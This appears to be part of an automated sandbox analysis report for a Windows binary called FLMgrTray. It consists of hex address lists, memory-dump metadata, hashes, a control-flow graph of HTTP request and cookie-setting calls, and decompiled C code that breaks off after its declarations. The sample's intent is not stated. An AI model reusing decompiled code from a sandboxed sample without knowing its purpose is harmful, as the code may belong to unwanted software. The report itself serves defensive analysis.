                                                                                        0x00189530
                                                                                        0x00189533
                                                                                        0x00189535
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0018953b
                                                                                        0x0018953f
                                                                                        0x00189542
                                                                                        0x00189544
                                                                                        0x00189549
                                                                                        0x0018954c
                                                                                        0x0018954f
                                                                                        0x00189552
                                                                                        0x00189555
                                                                                        0x00189559
                                                                                        0x0018955c
                                                                                        0x00189562
                                                                                        0x00189564
                                                                                        0x00189566
                                                                                        0x00189569
                                                                                        0x0018956e
                                                                                        0x00189570
                                                                                        0x00189573
                                                                                        0x00189578
                                                                                        0x0018957e
                                                                                        0x00189580
                                                                                        0x00189582
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00189582
                                                                                        0x00000000
                                                                                        0x00189530
                                                                                        0x0018952e
                                                                                        0x001894f0
                                                                                        0x001894b0
                                                                                        0x001894b0
                                                                                        0x001894b0
                                                                                        0x001894b2
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x001894b8
                                                                                        0x001894bb
                                                                                        0x001894bd
                                                                                        0x001894bf
                                                                                        0x001894c0
                                                                                        0x001894c3
                                                                                        0x001894c5
                                                                                        0x001894c8
                                                                                        0x001894c9
                                                                                        0x001894cb
                                                                                        0x001894ce
                                                                                        0x001894d1
                                                                                        0x001894d4
                                                                                        0x001894d7
                                                                                        0x001894dc
                                                                                        0x001894df
                                                                                        0x001894e2
                                                                                        0x001894e4
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x001894e4
                                                                                        0x00000000
                                                                                        0x001894b0
                                                                                        0x001893fb
                                                                                        0x001893fb
                                                                                        0x00189402
                                                                                        0x00000000
                                                                                        0x00189404
                                                                                        0x00189404
                                                                                        0x00189407
                                                                                        0x0018940d
                                                                                        0x00189410
                                                                                        0x00189413
                                                                                        0x00189416
                                                                                        0x00189419
                                                                                        0x0018941b
                                                                                        0x0018941f
                                                                                        0x00189422
                                                                                        0x00189425
                                                                                        0x0018942a
                                                                                        0x00189430
                                                                                        0x00189433
                                                                                        0x00189435
                                                                                        0x00189438
                                                                                        0x0018943b
                                                                                        0x0018943e
                                                                                        0x00189441
                                                                                        0x00189444
                                                                                        0x00189447
                                                                                        0x0018944a
                                                                                        0x00189451
                                                                                        0x00189454
                                                                                        0x00189457
                                                                                        0x0018945a
                                                                                        0x0018945d
                                                                                        0x00189463
                                                                                        0x00189463
                                                                                        0x00000000
                                                                                        0x0018945d
                                                                                        0x00189402
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00189630
                                                                                        0x00189630
                                                                                        0x00189633
                                                                                        0x00189635
                                                                                        0x00189688
                                                                                        0x00189688
                                                                                        0x0018968b
                                                                                        0x00189691
                                                                                        0x00000000
                                                                                        0x00189637
                                                                                        0x00189637
                                                                                        0x00189639
                                                                                        0x00189664
                                                                                        0x00189664
                                                                                        0x0018966b
                                                                                        0x0018966d
                                                                                        0x0018966f
                                                                                        0x00189673
                                                                                        0x00189675
                                                                                        0x00189678
                                                                                        0x0018967a
                                                                                        0x0018967c
                                                                                        0x0018967f
                                                                                        0x00189682
                                                                                        0x00189682
                                                                                        0x00189682
                                                                                        0x00000000
                                                                                        0x0018963b
                                                                                        0x0018963b
                                                                                        0x00189640
                                                                                        0x00189640
                                                                                        0x00189642
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00189648
                                                                                        0x0018964b
                                                                                        0x0018964d
                                                                                        0x0018964f
                                                                                        0x00189650
                                                                                        0x00189653
                                                                                        0x00189654
                                                                                        0x00189657
                                                                                        0x0018965a
                                                                                        0x0018965d
                                                                                        0x0018965f
                                                                                        0x00000000
                                                                                        0x00189661
                                                                                        0x00189661
                                                                                        0x00000000
                                                                                        0x00189661
                                                                                        0x00000000
                                                                                        0x0018965f
                                                                                        0x00000000
                                                                                        0x00189640
                                                                                        0x00189639
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00189698
                                                                                        0x00189698
                                                                                        0x0018969b
                                                                                        0x001896a2
                                                                                        0x001896a2
                                                                                        0x001896a5
                                                                                        0x001896a8
                                                                                        0x001896ab
                                                                                        0x001896ad
                                                                                        0x001896b0
                                                                                        0x001896b3
                                                                                        0x001896b8
                                                                                        0x001896bb
                                                                                        0x001896be
                                                                                        0x001896c0
                                                                                        0x001896fe
                                                                                        0x001896fe
                                                                                        0x00189700
                                                                                        0x001897a9
                                                                                        0x00000000
                                                                                        0x00189706
                                                                                        0x00189706
                                                                                        0x00189708
                                                                                        0x0018970d
                                                                                        0x00189710
                                                                                        0x00189712
                                                                                        0x00189718
                                                                                        0x0018971a
                                                                                        0x0018971d
                                                                                        0x0018971f
                                                                                        0x00189721
                                                                                        0x00189722
                                                                                        0x00189728
                                                                                        0x0018972a
                                                                                        0x0018972d
                                                                                        0x0018972f
                                                                                        0x00189734
                                                                                        0x0018973a
                                                                                        0x0018973c
                                                                                        0x0018973e
                                                                                        0x00189794
                                                                                        0x00189794
                                                                                        0x00189797
                                                                                        0x0018979a
                                                                                        0x0018979d
                                                                                        0x0018979f
                                                                                        0x001897a1
                                                                                        0x001897ac
                                                                                        0x001897ae
                                                                                        0x001897b1
                                                                                        0x001897b4
                                                                                        0x001897ba
                                                                                        0x001897bc
                                                                                        0x001897be
                                                                                        0x001897c1
                                                                                        0x001897c4
                                                                                        0x001897c6
                                                                                        0x001897dd
                                                                                        0x001897df
                                                                                        0x001897e2
                                                                                        0x001897e5
                                                                                        0x001897e5
                                                                                        0x001897e8
                                                                                        0x001897eb
                                                                                        0x001897ee
                                                                                        0x001897f1
                                                                                        0x001897f4
                                                                                        0x00000000
                                                                                        0x001897c8
                                                                                        0x001897c8
                                                                                        0x001897cb
                                                                                        0x001897ce
                                                                                        0x001897d1
                                                                                        0x00000000
                                                                                        0x001897d1
                                                                                        0x00189740
                                                                                        0x00189740
                                                                                        0x00189740
                                                                                        0x00189743
                                                                                        0x00189745
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0018974b
                                                                                        0x0018974f
                                                                                        0x00189752
                                                                                        0x00189754
                                                                                        0x00189759
                                                                                        0x0018975c
                                                                                        0x0018975f
                                                                                        0x00189762
                                                                                        0x00189765
                                                                                        0x00189769
                                                                                        0x0018976c
                                                                                        0x00189772
                                                                                        0x00189774
                                                                                        0x00189776
                                                                                        0x00189779
                                                                                        0x0018977e
                                                                                        0x00189780
                                                                                        0x00189783
                                                                                        0x00189788
                                                                                        0x0018978e
                                                                                        0x00189790
                                                                                        0x00189792
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00189792
                                                                                        0x00000000
                                                                                        0x00189740
                                                                                        0x0018973e
                                                                                        0x001896c2
                                                                                        0x001896c2
                                                                                        0x001896c5
                                                                                        0x001896c5
                                                                                        0x001896c7
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x001896cd
                                                                                        0x001896d0
                                                                                        0x001896d2
                                                                                        0x001896d4
                                                                                        0x001896d5
                                                                                        0x001896d8
                                                                                        0x001896d9
                                                                                        0x001896db
                                                                                        0x001896de
                                                                                        0x001896e1
                                                                                        0x001896e4
                                                                                        0x001896e6
                                                                                        0x001896e9
                                                                                        0x001896ec
                                                                                        0x001896f1
                                                                                        0x001896f4
                                                                                        0x001896f7
                                                                                        0x001896f9
                                                                                        0x00000000
                                                                                        0x001896fb
                                                                                        0x001896fb
                                                                                        0x00000000
                                                                                        0x001896fb
                                                                                        0x00000000
                                                                                        0x001896f9
                                                                                        0x00000000
                                                                                        0x001896c5
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x001897fb
                                                                                        0x001897fb
                                                                                        0x001897fe
                                                                                        0x00189800
                                                                                        0x0018985b
                                                                                        0x0018985b
                                                                                        0x00000000
                                                                                        0x00189802
                                                                                        0x00189802
                                                                                        0x00189804
                                                                                        0x00189834
                                                                                        0x00189834
                                                                                        0x0018983b
                                                                                        0x0018983d
                                                                                        0x0018983f
                                                                                        0x00189843
                                                                                        0x00189845
                                                                                        0x00189848
                                                                                        0x0018984b
                                                                                        0x0018984d
                                                                                        0x0018984f
                                                                                        0x00189852
                                                                                        0x00189855
                                                                                        0x00189855
                                                                                        0x00189855
                                                                                        0x00000000
                                                                                        0x00189806
                                                                                        0x00189806
                                                                                        0x00189810
                                                                                        0x00189810
                                                                                        0x00189812
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00189818
                                                                                        0x0018981b
                                                                                        0x0018981d
                                                                                        0x0018981f
                                                                                        0x00189820
                                                                                        0x00189823
                                                                                        0x00189824
                                                                                        0x00189827
                                                                                        0x0018982a
                                                                                        0x0018982d
                                                                                        0x0018982f
                                                                                        0x00000000
                                                                                        0x00189831
                                                                                        0x00189831
                                                                                        0x00000000
                                                                                        0x00189831
                                                                                        0x00000000
                                                                                        0x0018982f
                                                                                        0x00000000
                                                                                        0x00189810
                                                                                        0x00189804
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00189862
                                                                                        0x00189862
                                                                                        0x00189865
                                                                                        0x00189867
                                                                                        0x00000000
                                                                                        0x0018986d
                                                                                        0x0018986d
                                                                                        0x00189870
                                                                                        0x00189872
                                                                                        0x00189875
                                                                                        0x00189877
                                                                                        0x001898c4
                                                                                        0x001898c7
                                                                                        0x001898c7
                                                                                        0x001898c9
                                                                                        0x001898cc
                                                                                        0x001898cf
                                                                                        0x00000000
                                                                                        0x00189879
                                                                                        0x00189879
                                                                                        0x0018987b
                                                                                        0x0018987e
                                                                                        0x00189898
                                                                                        0x00189898
                                                                                        0x0018989b
                                                                                        0x0018989d
                                                                                        0x001898ae
                                                                                        0x001898b0
                                                                                        0x001898b0
                                                                                        0x0018989f
                                                                                        0x0018989f
                                                                                        0x001898a2
                                                                                        0x001898a4
                                                                                        0x001898a6
                                                                                        0x001898a6
                                                                                        0x001898b2
                                                                                        0x001898b5
                                                                                        0x001898b8
                                                                                        0x001898bc
                                                                                        0x001898bf
                                                                                        0x001898d2
                                                                                        0x001898d2
                                                                                        0x001898d5
                                                                                        0x001898d8
                                                                                        0x001898da
                                                                                        0x001898dd
                                                                                        0x001898e0
                                                                                        0x001898e3
                                                                                        0x001898e8
                                                                                        0x001898eb
                                                                                        0x001898ee
                                                                                        0x001898ee
                                                                                        0x001898f0
                                                                                        0x001898f0
                                                                                        0x001898f3
                                                                                        0x001898f5
                                                                                        0x001898f6
                                                                                        0x001898f6
                                                                                        0x001898f6
                                                                                        0x001898fb
                                                                                        0x001898fe
                                                                                        0x00189901
                                                                                        0x00189904
                                                                                        0x00189907
                                                                                        0x0018990d
                                                                                        0x0018990d
                                                                                        0x00000000
                                                                                        0x00189880
                                                                                        0x00189880
                                                                                        0x00189887
                                                                                        0x00000000
                                                                                        0x00189889
                                                                                        0x00189889
                                                                                        0x0018988c
                                                                                        0x001895f4
                                                                                        0x001895f4
                                                                                        0x001895fb
                                                                                        0x001895fb
                                                                                        0x00000000
                                                                                        0x001895fb
                                                                                        0x00189887
                                                                                        0x0018987e
                                                                                        0x00189877
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00189919
                                                                                        0x0018991d
                                                                                        0x00000000
                                                                                        0x00189923
                                                                                        0x00189923
                                                                                        0x00189926
                                                                                        0x00189929
                                                                                        0x0018992c
                                                                                        0x0018992f
                                                                                        0x00189931
                                                                                        0x00189934
                                                                                        0x00000000
                                                                                        0x00189934
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00189940
                                                                                        0x00189944
                                                                                        0x00189a36
                                                                                        0x00189a36
                                                                                        0x00000000
                                                                                        0x0018994a
                                                                                        0x0018994a
                                                                                        0x0018994d
                                                                                        0x0018997a
                                                                                        0x0018997a
                                                                                        0x0018997d
                                                                                        0x00189980
                                                                                        0x00189983
                                                                                        0x00189986
                                                                                        0x00189989
                                                                                        0x0018998b
                                                                                        0x0018998e
                                                                                        0x00189991
                                                                                        0x00189994
                                                                                        0x00189996
                                                                                        0x00189998
                                                                                        0x0018999c
                                                                                        0x0018999e
                                                                                        0x001899a1
                                                                                        0x001899a4
                                                                                        0x001899a7
                                                                                        0x001899ab
                                                                                        0x001899ae
                                                                                        0x001899af
                                                                                        0x001899b0
                                                                                        0x001899b9
                                                                                        0x001899b2
                                                                                        0x001899b2
                                                                                        0x001899b2
                                                                                        0x001899be
                                                                                        0x001899c1
                                                                                        0x001899c4
                                                                                        0x001899c7
                                                                                        0x001899ca
                                                                                        0x001899cd
                                                                                        0x001899cd
                                                                                        0x0018999c
                                                                                        0x001899d0
                                                                                        0x001899d3
                                                                                        0x001899d6
                                                                                        0x001899d9
                                                                                        0x001899db
                                                                                        0x00189a2c
                                                                                        0x00189a2c
                                                                                        0x00189a2e
                                                                                        0x00189a2e
                                                                                        0x00189a30
                                                                                        0x00189a33
                                                                                        0x00000000
                                                                                        0x001899dd
                                                                                        0x001899dd
                                                                                        0x001899e1
                                                                                        0x001899e3
                                                                                        0x001899ea
                                                                                        0x001899ef
                                                                                        0x001899f2
                                                                                        0x001899f5
                                                                                        0x001899f7
                                                                                        0x001899fe
                                                                                        0x00189a03
                                                                                        0x00189a08
                                                                                        0x00189a0b
                                                                                        0x00189a0b
                                                                                        0x00189a0b
                                                                                        0x00189a0e
                                                                                        0x00189a0e
                                                                                        0x00189a11
                                                                                        0x00189a14
                                                                                        0x00000000
                                                                                        0x00189a16
                                                                                        0x00189a16
                                                                                        0x00189a19
                                                                                        0x00189a20
                                                                                        0x00000000
                                                                                        0x00189a20
                                                                                        0x00189a14
                                                                                        0x00189950
                                                                                        0x00189950
                                                                                        0x00189950
                                                                                        0x00189952
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00189958
                                                                                        0x0018995b
                                                                                        0x0018995d
                                                                                        0x0018995f
                                                                                        0x00189962
                                                                                        0x00189963
                                                                                        0x00189966
                                                                                        0x00189968
                                                                                        0x0018996b
                                                                                        0x0018996c
                                                                                        0x0018996f
                                                                                        0x00189972
                                                                                        0x00189975
                                                                                        0x00000000
                                                                                        0x00189977
                                                                                        0x00189977
                                                                                        0x00000000
                                                                                        0x00189977
                                                                                        0x00000000
                                                                                        0x00189975
                                                                                        0x00000000
                                                                                        0x00189950
                                                                                        0x0018994d
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00189a3d
                                                                                        0x00189a3d
                                                                                        0x00189a41
                                                                                        0x00189acf
                                                                                        0x00189acf
                                                                                        0x00000000
                                                                                        0x00189a47
                                                                                        0x00189a47
                                                                                        0x00189a4b
                                                                                        0x00000000
                                                                                        0x00189a51
                                                                                        0x00189a51
                                                                                        0x00189a54
                                                                                        0x00189a80
                                                                                        0x00189a80
                                                                                        0x00189a83
                                                                                        0x00189ac6
                                                                                        0x00189acd
                                                                                        0x00189acd
                                                                                        0x00000000
                                                                                        0x00189a85
                                                                                        0x00189a85
                                                                                        0x00189a88
                                                                                        0x00189a8f
                                                                                        0x00000000
                                                                                        0x00189a8f
                                                                                        0x00189a56
                                                                                        0x00189a56
                                                                                        0x00189a56
                                                                                        0x00189a58
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00189a5e
                                                                                        0x00189a61
                                                                                        0x00189a63
                                                                                        0x00189a65
                                                                                        0x00189a68
                                                                                        0x00189a69
                                                                                        0x00189a6c
                                                                                        0x00189a6e
                                                                                        0x00189a71
                                                                                        0x00189a72
                                                                                        0x00189a75
                                                                                        0x00189a78
                                                                                        0x00189a7b
                                                                                        0x00000000
                                                                                        0x00189a7d
                                                                                        0x00189a7d
                                                                                        0x00000000
                                                                                        0x00189a7d
                                                                                        0x00000000
                                                                                        0x00189a7b
                                                                                        0x00000000
                                                                                        0x00189a56
                                                                                        0x00189a54
                                                                                        0x00189a4b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00189ad6
                                                                                        0x00189ad6
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00189ae2
                                                                                        0x00188a5a
                                                                                        0x00188a5a
                                                                                        0x00188a5d
                                                                                        0x00188a5d
                                                                                        0x00188a60
                                                                                        0x00188a60
                                                                                        0x00188a66
                                                                                        0x00188a69
                                                                                        0x00188a6f
                                                                                        0x00188a75
                                                                                        0x00188a7b
                                                                                        0x00188a7d
                                                                                        0x00188a81
                                                                                        0x00188a84
                                                                                        0x00188a87
                                                                                        0x00188a8a
                                                                                        0x00188ab3
                                                                                        0x00188abd
                                                                                        0x00188ac5
                                                                                        0x00188ac7
                                                                                        0x00000000
                                                                                        0x00188acd
                                                                                        0x00188acd
                                                                                        0x00000000
                                                                                        0x00188acd
                                                                                        0x00188a8c
                                                                                        0x00188a8c
                                                                                        0x00188a8f
                                                                                        0x00189af6
                                                                                        0x00189af9
                                                                                        0x00189afc
                                                                                        0x00189aff
                                                                                        0x00189b02
                                                                                        0x00189b05
                                                                                        0x00189b08
                                                                                        0x00189b0c
                                                                                        0x00189b0f
                                                                                        0x00189b12
                                                                                        0x00189b14
                                                                                        0x00189b16
                                                                                        0x00189b1b
                                                                                        0x00189b20
                                                                                        0x00189b24
                                                                                        0x00189b25
                                                                                        0x00189b26
                                                                                        0x00189b27
                                                                                        0x00189b30
                                                                                        0x00189b29
                                                                                        0x00189b29
                                                                                        0x00189b29
                                                                                        0x00189b35
                                                                                        0x00189b38
                                                                                        0x00189b38
                                                                                        0x00189b16
                                                                                        0x00189b3b
                                                                                        0x00189b3b
                                                                                        0x00189b3e
                                                                                        0x00189b44
                                                                                        0x00189b52
                                                                                        0x00189b52
                                                                                        0x00189b46
                                                                                        0x00189b46
                                                                                        0x00189b4c
                                                                                        0x00000000
                                                                                        0x00189b4e
                                                                                        0x00189b4e
                                                                                        0x00189b4e
                                                                                        0x00189b4c
                                                                                        0x00189b57
                                                                                        0x00189b5c
                                                                                        0x00189b63
                                                                                        0x00189b6a
                                                                                        0x00189b70
                                                                                        0x00189b74
                                                                                        0x00189b76
                                                                                        0x00189b76
                                                                                        0x00189b79
                                                                                        0x00189b7b
                                                                                        0x00189b7f
                                                                                        0x00189b82
                                                                                        0x00189b8a
                                                                                        0x00189b8a
                                                                                        0x00189b8e
                                                                                        0x00189baf
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00189b84
                                                                                        0x00189b84
                                                                                        0x00189b88
                                                                                        0x00189b90
                                                                                        0x00189b90
                                                                                        0x00189b99
                                                                                        0x00189b9c
                                                                                        0x00189ba3
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00189b88
                                                                                        0x00188a95
                                                                                        0x00188a95
                                                                                        0x00188a95
                                                                                        0x00188a98
                                                                                        0x00188a9d
                                                                                        0x00000000
                                                                                        0x00188aa3
                                                                                        0x00188aa3
                                                                                        0x00188aa8
                                                                                        0x00000000
                                                                                        0x00188aaa
                                                                                        0x00188aaa
                                                                                        0x00188aad
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00188aad
                                                                                        0x00188aa8
                                                                                        0x00188a9d
                                                                                        0x00188a8f
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00188ad4
                                                                                        0x00188adf
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x001895fe
                                                                                        0x001895fe
                                                                                        0x001895fe
                                                                                        0x00189601
                                                                                        0x00189604
                                                                                        0x00189609
                                                                                        0x00000000
                                                                                        0x00188510
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x001884a0
                                                                                        0x00188493
                                                                                        0x00000000

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4ba79045a552ccbfc69283df7efa8ff0e9d97e563c712ac52b61d1d9913bab1f
                                                                                        • Instruction ID: 4891dff4068a426cc7d87ee1e99b63301d2cbe993a2b7129a7e92efe5867ea76
                                                                                        • Opcode Fuzzy Hash: 4ba79045a552ccbfc69283df7efa8ff0e9d97e563c712ac52b61d1d9913bab1f
                                                                                        • Instruction Fuzzy Hash: 9A626DB1E012159FDB18DF59C5806ADBBB1FF48304F6881AED814AB392D775DA42CF90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E00176572() {
                                                                                        				_Unknown_base(*)()* _t1;
                                                                                        
                                                                                        				_t1 = SetUnhandledExceptionFilter(E0017657E); // executed
                                                                                        				return _t1;
                                                                                        			}




                                                                                        0x00176577
                                                                                        0x0017657d

                                                                                        APIs
                                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_0001657E,00175FC5), ref: 00176577
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                        • String ID:
                                                                                        • API String ID: 3192549508-0
                                                                                        • Opcode ID: 8acfdb677bb35b3707b3b8e3a2f3cae2109a81d908b769c8501b2804a8366f63
                                                                                        • Instruction ID: 7c56bd465fe9a46ca1a375ffe4ee34cb68ddf0726280c27e047beebb79ac4209
                                                                                        • Opcode Fuzzy Hash: 8acfdb677bb35b3707b3b8e3a2f3cae2109a81d908b769c8501b2804a8366f63
                                                                                        • Instruction Fuzzy Hash:
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 143 186600-186638 144 18663e-186641 143->144 145 1867f2-186802 _CxxThrowException 143->145 144->145 147 186647-186678 HttpOpenRequestA 144->147 146 186807-186817 _CxxThrowException 145->146 148 18681c-18682c _CxxThrowException 146->148 149 18667e-186681 147->149 150 186846-1868a5 _CxxThrowException 147->150 151 186831-186841 _CxxThrowException 148->151 149->150 154 186687-18669c HttpAddRequestHeadersA 149->154 152 186bf8-186c02 150->152 153 1868ab-1868ae 150->153 151->150 156 186c0e-186c13 152->156 153->152 155 1868b4-1868e5 HttpOpenRequestA 153->155 154->146 157 1866a2-1866a9 154->157 158 1868eb-1868ee 155->158 159 186bec-186bf6 155->159 160 186c19-186c58 _CxxThrowException 156->160 161 1867bd-1867d0 HttpSendRequestA 157->161 162 1866af-1866ce 157->162 158->159 163 1868f4-186909 HttpAddRequestHeadersA 158->163 159->156 164 186c5e-186c61 160->164 165 186e76-186e86 _CxxThrowException 160->165 161->148 168 1867d2-1867ef call 1755f4 161->168 166 1866de-1866e0 162->166 167 1866d0-1866d3 162->167 169 18690f-18691a 163->169 170 186c04 163->170 164->165 171 186c67-186c98 HttpOpenRequestA 164->171 174 186e8b-186e9b _CxxThrowException 165->174 176 1866e5-1866e8 call 163450 166->176 172 1866ed-1866f4 167->172 173 1866d5-1866dc 167->173 180 186920-186925 169->180 170->156 181 186c9e-186ca1 171->181 182 186ed6-186eeb _CxxThrowException 171->182 178 1866f8-186707 call 177160 172->178 179 1866f6 172->179 173->176 183 186ea0-186ebc HeapFree _CxxThrowException 174->183 176->172 193 186709-18670d 178->193 194 18670f-186712 178->194 179->178 180->180 186 186927-18693b HttpAddRequestHeadersA 180->186 181->182 187 186ca7-186cbc HttpAddRequestHeadersA 181->187 192 186ec1-186ed1 _CxxThrowException 183->192 186->170 190 186941-186948 186->190 187->174 191 186cc2-186cc9 187->191 195 18694e-186976 190->195 196 186a83-186ac9 call 185a90 memset call 185a20 190->196 197 186ddd-186e1b call 186180 GetProcessHeap HeapAlloc call 186180 call 1861c0 191->197 198 186ccf-186cee 191->198 192->182 202 18671b 193->202 203 18671d-186742 call 1859f0 194->203 204 186714 194->204 205 186978-18697b 195->205 206 186986-186988 195->206 234 186ad0-186ad5 196->234 253 186e20-186e25 197->253 199 186cfe-186d00 198->199 200 186cf0-186cf3 198->200 213 186d05-186d08 call 163450 199->213 209 186d0d-186d14 200->209 210 186cf5-186cfc 200->210 202->203 214 18675b-18676e call 177160 202->214 233 186745-18674a 203->233 204->202 216 186998-18699f 205->216 217 18697d-186984 205->217 211 18698d-186993 call 163450 206->211 225 186d18-186d27 call 177160 209->225 226 186d16 209->226 210->213 211->216 213->209 235 1867ae-1867b8 call 162440 214->235 236 186770 214->236 223 1869a1 216->223 224 1869a3-1869b5 call 177160 216->224 217->211 223->224 244 1869bd-1869c0 224->244 245 1869b7-1869bb 224->245 246 186d29-186d2d 225->246 247 186d2f-186d32 225->247 226->225 233->233 240 18674c-186756 call 1661b0 233->240 234->234 241 186ad7-186af1 HttpAddRequestHeadersA 234->241 235->161 242 186776-186780 236->242 240->214 241->170 250 186af7-186b21 HttpSendRequestExA 241->250 251 186782 242->251 252 186784-186788 242->252 255 1869cb-1869f0 call 1859f0 244->255 256 1869c2 244->256 254 1869c9 245->254 257 186d3b 246->257 258 186d3d-186d62 call 1859f0 247->258 259 186d34 247->259 260 186b4e-186b72 InternetWriteFile 250->260 261 186b23-186b3a call 186160 250->261 251->252 262 18678a 252->262 263 18678c-18679e InternetSetCookieA 252->263 253->253 264 186e27-186e3b HttpSendRequestA 253->264 254->255 265 186a0c-186a22 call 177160 254->265 287 1869f3-1869f8 255->287 256->254 257->258 267 186d7b-186d8e call 177160 257->267 279 186d65-186d6a 258->279 259->257 276 186b8b-186b9d HttpEndRequestW 260->276 277 186b74-186b86 call 186160 260->277 261->156 262->263 263->151 273 1867a4-1867ac 263->273 274 186e4a-186e73 GetProcessHeap HeapFree call 1755f4 264->274 275 186e3d-186e48 GetLastError 264->275 292 186a71-186a7e call 162440 265->292 293 186a24-186a2a 265->293 294 186dce-186dd8 call 162440 267->294 295 186d90 267->295 273->235 273->242 275->183 275->274 285 186bbd-186be9 GetProcessHeap HeapFree call 1755f4 276->285 286 186b9f-186bbb call 186160 276->286 277->156 279->279 290 186d6c-186d76 call 1661b0 279->290 286->160 287->287 289 1869fa-186a07 call 1661b0 287->289 289->265 290->267 292->196 302 186a30-186a3a 293->302 294->197 303 186d96-186da0 295->303 306 186a3c 302->306 307 186a3e-186a42 302->307 308 186da2 303->308 309 186da4-186da8 303->309 306->307 310 186a44 307->310 311 186a46-186a61 InternetSetCookieA 307->311 308->309 312 186daa 309->312 313 186dac-186dbe InternetSetCookieA 309->313 310->311 314 186b3f-186b49 311->314 315 186a67-186a6f 311->315 312->313 313->192 316 186dc4-186dcc 313->316 314->156 315->292 315->302 316->294 316->303
                                                                                        C-Code - Quality: 62%
                                                                                        			E00186600(void* __ecx, void* _a4, char* _a8) {
                                                                                        				char* _v8;
                                                                                        				signed int* _v12;
                                                                                        				long _v16;
                                                                                        				void* _v20;
                                                                                        				short _v24;
                                                                                        				char* _v28;
                                                                                        				signed int _v32;
                                                                                        				signed int _v36;
                                                                                        				signed int _v40;
                                                                                        				short _v44;
                                                                                        				long _v52;
                                                                                        				char* _v56;
                                                                                        				char* _v60;
                                                                                        				char _v64;
                                                                                        				char _v72;
                                                                                        				char _v76;
                                                                                        				char* _v80;
                                                                                        				long _v84;
                                                                                        				char* _v112;
                                                                                        				char* _v116;
                                                                                        				char _v136;
                                                                                        				signed int _v140;
                                                                                        				char _v1060;
                                                                                        				signed int _v1061;
                                                                                        				char _v1068;
                                                                                        				signed int _v1072;
                                                                                        				signed int _v1076;
                                                                                        				intOrPtr* _v1080;
                                                                                        				intOrPtr _v1084;
                                                                                        				signed int _v1088;
                                                                                        				char _v1092;
                                                                                        				char* _v1096;
                                                                                        				long _v1100;
                                                                                        				char _v1104;
                                                                                        				char* _v1204;
                                                                                        				char* _v1228;
                                                                                        				void* _v1232;
                                                                                        				char _v1252;
                                                                                        				signed int _v1256;
                                                                                        				char* _v1364;
                                                                                        				char _v1372;
                                                                                        				signed int _v1376;
                                                                                        				char* _v1380;
                                                                                        				char* _v1384;
                                                                                        				intOrPtr _v1400;
                                                                                        				intOrPtr _v1404;
                                                                                        				intOrPtr _v1408;
                                                                                        				intOrPtr _v1412;
                                                                                        				intOrPtr _v1416;
                                                                                        				signed int _v1420;
                                                                                        				intOrPtr* _v1424;
                                                                                        				signed int _v1436;
                                                                                        				char _v2461;
                                                                                        				signed int _v2476;
                                                                                        				intOrPtr _v2480;
                                                                                        				intOrPtr _v2484;
                                                                                        				intOrPtr _v2488;
